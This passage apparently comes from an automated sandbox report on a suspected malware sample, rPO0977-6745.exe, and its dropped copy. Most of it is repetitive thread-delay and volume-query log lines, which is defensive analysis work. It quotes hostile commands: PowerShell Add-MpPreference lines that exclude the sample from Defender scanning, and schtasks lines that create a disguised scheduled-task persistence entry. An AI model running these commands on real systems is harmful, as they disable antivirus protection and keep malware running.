              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599094s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598982s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598766s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598547s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598328s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -598094s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597984s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597765s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597547s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597328s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597216s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -597000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596781s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596660s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596516s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596357s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596241s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596140s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -596029s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595921s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595812s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595703s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595594s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595375s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595265s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595156s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -595046s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -594937s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -594828s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -594714s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -594607s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -594500s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599872Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599654Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599312Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599202Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599093Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598983Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598758Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598542Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598436Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598091Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597983Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597653Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597109Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596204Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595640Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599890
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599781
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599672
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599562
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599453
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599344
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599220
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599094
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598982
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598875
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598766
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598656
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598547
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598437
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598328
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598219
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598094
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597984
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597875
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597765
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597656
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597547
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597437
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597328
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597216
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597109
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597000
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596890
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596781
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596660
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596516
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596357
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596241
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596140
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596029
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595921
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595812
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595703
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595594
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595484
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595375
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595265
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595156
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595046
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594937
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594828
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594714
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594607
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594500
              Source: EDyxAgkldisLe.exe, 00000017.00000002.3689470332.00000000009F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
              Source: rPO0977-6745.exe, 0000000A.00000002.3693243826.00000000031E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dcac7a674eafb1<
              Source: EDyxAgkldisLe.exe, 00000017.00000002.3693041192.0000000002A55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dcac9db89d7b60<
              Source: rPO0977-6745.exe, 0000000A.00000002.3690480544.0000000001206000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory written: C:\Users\user\Desktop\rPO0977-6745.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory written: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp44AD.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeProcess created: C:\Users\user\Desktop\rPO0977-6745.exe "C:\Users\user\Desktop\rPO0977-6745.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EDyxAgkldisLe" /XML "C:\Users\user\AppData\Local\Temp\tmp547C.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess created: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe "C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Users\user\Desktop\rPO0977-6745.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
